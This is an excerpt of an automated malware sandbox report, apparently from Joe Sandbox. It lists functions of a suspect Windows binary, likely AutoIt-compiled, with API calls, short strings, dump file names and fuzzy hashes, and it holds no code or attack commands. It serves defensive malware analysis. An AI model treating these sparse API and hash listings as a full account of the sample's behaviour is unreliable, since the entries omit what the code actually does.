                                                                              Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: $8'I
                                                                              • API String ID: 2358735015-3608026889
                                                                              • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                              • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                              • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                              • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                              Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3380330463-3941886329
                                                                              • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                              • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                              • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                              • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                              Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH
                                                                              • API String ID: 1143807570-3662162768
                                                                              • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                              • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                              • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                              • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                              Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH$HH
                                                                              • API String ID: 0-1787419579
                                                                              • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                              • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                              Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                              • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                              • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                              • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                              Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                              • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                              Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                              • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                              • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                              • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                              Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                              • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                              • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                              • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                              Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                              • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                              • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                              • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                              Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00474833
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                              • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                              • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                              • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                              Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                              • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                              • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                              • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                              Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                              • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                              • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                              • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                              Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InternetOpen
                                                                              • String ID: <local>
                                                                              • API String ID: 2038078732-4266983199
                                                                              • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                              • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                              • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                              • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                              Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                              • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                              • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                              • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                              Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                              • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                              • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                              • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                              Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • wsprintfW.USER32 ref: 004560E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_mallocwsprintf
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 1262938277-328681919
                                                                              • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                              • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                              • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                              • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                              Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
